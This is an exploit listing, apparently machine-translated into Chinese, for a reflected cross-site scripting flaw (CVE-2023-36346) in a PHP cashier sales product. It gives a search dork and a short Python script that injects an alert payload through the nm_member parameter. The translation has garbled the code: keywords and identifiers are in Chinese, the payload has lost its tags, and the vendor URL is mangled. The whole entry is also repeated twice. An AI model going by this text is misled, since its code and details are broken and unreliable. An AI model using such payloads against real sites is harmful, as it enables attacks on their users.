#利用标题:出纳商品的销售v1.0-跨站点脚本(XSS)
#日期: 2023-06-23
#Country:伊朗
#利用作者: Amirhossein Bahramizadeh
#类别: WebApps
#Dork : /print.php?nm_member=
#供应商homepage3360 https://www.codekop.com/products/so...r-kasir-dengan-dengan-php-mysql-3.html-3.html
#在: Windows/Linux上测试
#CVE : CVE-2023-36346
导入请求
导入Urllib.Parse
#设置目标URL和有效载荷
url='http://example.com/print.php'
有效载荷='scriptalert('xss')/脚本'
#编码URL包含的有效载荷
有效载荷=urllib.parse.quote(有效载荷)
#构建请求参数
params={
'NM_Member':有效载荷
}
#发送请求并打印回复
响应=requests.get(url,params=params)
打印(响应。文本)
#日期: 2023-06-23
#Country:伊朗
#利用作者: Amirhossein Bahramizadeh
#类别: WebApps
#Dork : /print.php?nm_member=
#供应商homepage3360 https://www.codekop.com/products/so...r-kasir-dengan-dengan-php-mysql-3.html-3.html
#在: Windows/Linux上测试
#CVE : CVE-2023-36346
导入请求
导入Urllib.Parse
#设置目标URL和有效载荷
url='http://example.com/print.php'
有效载荷='scriptalert('xss')/脚本'
#编码URL包含的有效载荷
有效载荷=urllib.parse.quote(有效载荷)
#构建请求参数
params={
'NM_Member':有效载荷
}
#发送请求并打印回复
响应=requests.get(url,params=params)
打印(响应。文本)
